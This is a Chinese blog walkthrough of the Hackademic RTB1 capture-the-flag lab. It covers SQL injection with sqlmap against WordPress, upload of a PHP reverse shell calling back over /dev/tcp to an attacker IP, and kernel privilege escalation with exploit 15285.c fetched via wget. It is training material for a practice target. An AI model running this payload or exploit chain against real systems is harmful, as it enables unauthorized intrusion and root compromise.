HackademicRTB1靶机练习

最新推荐文章于 2024-08-14 20:16:38 发布
最新推荐文章于 2024-08-14 20:16:38 发布
阅读量478 收藏
点赞数 2
分类专栏: 靶场 文章标签: 服务器 linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/IWANnaaa/article/details/127845234
版权

首先进行主机探测

fping -asg 192.168.47.0/24
nmap -sV -min--rate 10000 192.168.47.0/24

扫描到IP地址为192.168.47.146的新主机,仅有一个80端口,22端口的ssh并没有开启

 点击Uncategorized发现到了URL中以get参数提交的字符,怀疑到了SQL注入,我们在页面上加个单引号尝试报错,发现报错后直接使用sqlmap跑出数据库

 

 

看到有一列叫做user_level,应该是用户等级,可能是等级越高权限越高,所以使用GeorgeMiller用户登陆,到WP默认的登陆页面中进行登录http://url/wp_login,获取到后台权限,尝试寻找上传木马或者命令执行的模块。 发现了OPTION模块的左上角有一个Allow File Upload,允许文件上传的勾选框,并且可以设置可上传文件的类型,添加php文件后缀。 点击Update Options后发现模块中多了一个upload模块,进入发现可以直接进行文件上传

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.47.137/1234 0>&1'"); ?>

 找了很多方式后并没有可以提权的漏洞,尝试一下内核提权

searchsploit linux kernel 2.6.3 | grep 'Privilege Escalation'

 看到中间几个2.6.3版本的内核提权,决定使用编号为12585的提权方式,将C语言文件复制到当前工作目录下,并且开启http服务

searchsploit linux kernel -m 15285.c 
python -m http.server 8888

 在获得到的shell中进入tmp目录下并且使用wget 下载15285.c文件

gcc 15285.c -o 15285     编译
./15285                  运行

 

[靶机渗透笔记] HACKADEMIC: RTB1
H4ppyD0g的博客
01-23 2292
靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫描具体信息 sudo nmap 192.168.200.129/24 192.168.200.134开启22和80端口,为靶机的ip地址。 前期扫描 nmap扫描靶机开启的两个端口的版本信息 sudo nmap -p 22,80 -sV 192.168.200.134 针对80端口 nmap默认脚本扫
CTF之Hackademic RTB1 靶机渗透(Wordpress1.5 SQL注入)
afei001
08-22 674
练习环境     攻击机:kali     靶机:Hackademic: RTB1     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2322
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
渗透测试靶机---Hackademic.RTB1
久恙502的博客
11-01 296
渗透测试,打靶经历记录,大佬多多指点,谢谢!
hackademic.RTB1(利用php_reverse_shell)
JyajT的博客
04-23 403
针对vulhub的练习
Hackademic.RTB1
weixin_44770698的博客
12-08 415
靶场练习
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1387
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
CTF之Hackademic RTB2 靶机渗透(万能密码 端口敲门 joomla1.5 SQL注入)
afei001
08-22 948
练习环境     攻击机:kali     靶机:Hackademic: RTB2     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Hackademic.RTB1靶场实战【超详细】
weixin_68615160的博客
08-14 781
其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css。可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面。挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析。排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用。查看当前权限,发现需要密码。
oscp——Hackademic: RTB1
王嘟嘟的博客
02-22 617
0x00 前言 这是第33台机子啦 0x01 信息收集 0x02 Web80——webshell 访问一下网站,发现一个说明,这个时候一般都是要扫一下目录。 这里找到了一个特别的url,这里测试了一下sql注入 http://192.168.25.207/Hackademic_RTB1/?cat=1 拿到了一些账号密码,使用GeorgeMiller q1w2e3 进行登录 写一个反弹s...
HACKADMIC-RTB1靶场(打靶流程)
qq_53733257的博客
10-29 894
HACKADMIC-RTB1靶场(打靶流程)
Vulnhub系列靶机-Hackadmeic.RTB1
来日可期的博客
09-17 1874
刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录。并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。提交之后,需要获取到上传的路径,才可以触发反弹shell。,发现有SQL语句的报错信息,可以判断有SQL注入漏洞。扫描到了22端口和80端口,但是22端口的关闭的。在点击页面中能点击的链接的时候,发现点击。
Hackademic.RTB1靶机渗透笔记
m0_72212352的博客
10-31 428
4.点击该连接,进入以下页面,提示目标为根目录的Key.txt,同时出现两个连接,分别访问。发现只有登录GeorgeMiller账号出现文件上传点,设置允许上传文件。查看id,已经提升到root权限,在根目录找到key.txt文件并查看。使用sqlmap进行扫描,出现结果,以此为突破点进行深入扫描。7.知道了可以登录的用户名和密码,要找到可以进行登录的地方。kali接收到反弹shell,并查看系统版本。3.出现web服务,进行访问,存在跳转连接。使用sql进行扫描,结果显示不存在。
【Vulnhub靶机】Hackadmeic.RTB1
过期的秋刀鱼
08-19 653
(此系列共2台)难度:初级。
vulnhub系列:Hackademic.RTB1
jq_j37的博客
08-13 488
vulnhub系列:Hackademic.RTB1靶机,打靶文章
Hackademic.RTB1靶场练习
2301_78494717的博客
11-07 114
使用前面所找到的登录页面进行登录,发现只有登录GeorgeMiller账号出现文件上传点,设置允许上传文件。发现22端口是ssh服务,80端口是Apache httpd 2.2.15且系统是Fedora。P=9,怀疑存在sql注入,我们手动注入一下,一阵判断发现此页面并无sql注入。1)将靶机换成NAT模式的网络适配器。Kali(攻击机)IP:192.168.92.131。把15285.c复制到/var/www/html下。Kali进行本网段扫描,并查看kali IP。Cat=1,可能有SQL注入。
Hackademic.RTB1-渗透报告
weixin_73942557的博客
10-30 197
找出服务器存在的安全隐患,和服务器管理员的相关人员的不安全行为,因此本次渗透流程采用黑盒测试。建议将网站的后台界面做有效的安全性处理,对用户的访问权限做有效的限制,对接受的参数做有效的安全性校验和过滤。这个靶机主要是利用泄露的敏感目录,然后访问到后台页面,通过注入漏洞拿到后台管理员的密码,从而造成服务器权限的丢失。找出目标服务器存在的脆弱性、威胁面、影响范围等多维度的安全问题,为服务器和网站的后续加固提供思路。减低敏感目录权限,对url接受的参数加上有效的校验和过滤,固定文件上传的类型。
Hackademic.RTB1靶场
m0_72012500的博客
11-01 167
输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?
Vulnhub靶机:HACKADEMIC_ RTB1
LainWith的博客
12-23 718
Hackademic(此系列共2台)发布日期:2011年9月6日难度:初级运行环境:VMware Workstation目标:取得 root 权限 + flag主机发现端口扫描+漏洞扫描Sql注入wordpress挂马内核提权。
应急响应靶机练习-web3
最新发布
01-05
### 关于应急响应靶机练习中的Web3资源 在进行应急响应靶机练习时,针对Web3技术的学习和实践尤为重要。对于希望深入理解并掌握Web3安全性的个人而言,可以从以下几个方面获取相关资源和支持。 #### Web3应急响应靶机介绍 为了更好地理解和应对Web3环境下的攻击模式和技术手段,可以利用专门设计用于模拟真实世界网络攻击场景的虚拟实验室——即所谓的“靶机”。这类平台允许参与者在一个受控环境中测试自己的技能,并通过解决实际问题来提高技术水平[^2]。 #### 获取Web3应急响应靶机的方法 有多种途径可以获得适合做Web3应急响应训练的靶机: - **官方渠道**:一些知名的CTF竞赛网站会不定期发布基于区块链或去中心化应用(DApps)构建的任务挑战赛;这些活动通常伴随着详细的文档说明以及必要的安装包下载链接。 - **社区分享**:活跃的技术交流平台上经常会有开发者上传自己制作的小型实验项目供他人参考学习。例如,在优快云博客上就有作者提供了名为`windows-web3`的一系列教程及其配套使用的镜像文件下载地址。 ```bash wget https://pan.quark.cn/s/1fb45a02f814 -O windows-web3.zip unzip windows-web3.zip ``` #### 学习路径建议 除了直接参与具体的攻防演练外,还应该注重理论知识体系的建设。这包括但不限于熟悉常见的智能合约漏洞类型、Solidity编程语言特性等基础知识。同时也要关注行业动态和发展趋势,及时更新自身的认知框架[^1]。 #### 实战技巧总结 当面对复杂的Web3应用场景时,有效的分析方法论不可或缺。这里列举几个实用性强的原则作为参考: - 始终保持怀疑态度对待任何未经验证的信息输入; - 对每一行代码都执行严格的审计流程; - 积极参加各类线上线下培训课程以拓宽视野范围。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值